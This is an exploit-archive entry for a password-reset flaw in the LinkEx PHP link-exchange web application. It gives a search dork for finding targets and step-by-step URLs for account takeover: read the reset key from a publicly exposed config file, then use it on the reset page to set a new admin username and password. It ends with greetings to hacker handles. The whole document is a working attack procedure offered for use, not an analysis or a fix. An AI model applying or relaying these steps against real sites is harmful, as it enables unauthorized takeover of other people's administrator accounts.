LinEx - Password Reset Vulnerability

2014-03-29T00:00:00
ID 1337DAY-ID-22083
Type zdt
Reporter Sri Harsha
Modified 2014-03-29T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: LinEx All Versions Password Reset Vulnerability
# Google Dork:  linkex.dk 2006-2011
# Date: 15/01/2014
# Exploit Author: N B Sri Harsha ( Reconnect Gray hat )
# Vendor Homepage: http://linkex.dk/
# Software Link: http://linkex.dk/releases/linkex.20120508.zip
# Version: All Versions
 
 
LinkEx Is A Open Source Web Application For Exchanging link ,  Which Most
Of The Porn Sites Uses it ,
 
1) First GO Here http://site.com/linkex/?page=admin
2) Click On Forgot password and enter the captcha
3) Go Here >> site.com/linkex/data/config/config
Note down the " key " parameter
ie :- "key";s:32:"36d1dd98c84e643236216449e96bed0d"
4) Now Use the Key Here >> site.com/linkex/?page=resetpassword&key=[key]
5) Thats It U Will Asked For New Username And Password
 
 
Shouts to :-  | ROHIT ROY | GRAY CODE | Moni HBH | Yamraaj | HALK | Le3to |
HaXarwOw | COSMO | 404 [email protected][email protected] | Root Breaker | N3O | Godhacker |
3QUIVOR | Dmostwanted | r00t.hc0n | hun73r_ihos |
 
-- 
Regards
N B Sri Harsha

#  0day.today [2018-03-19]  #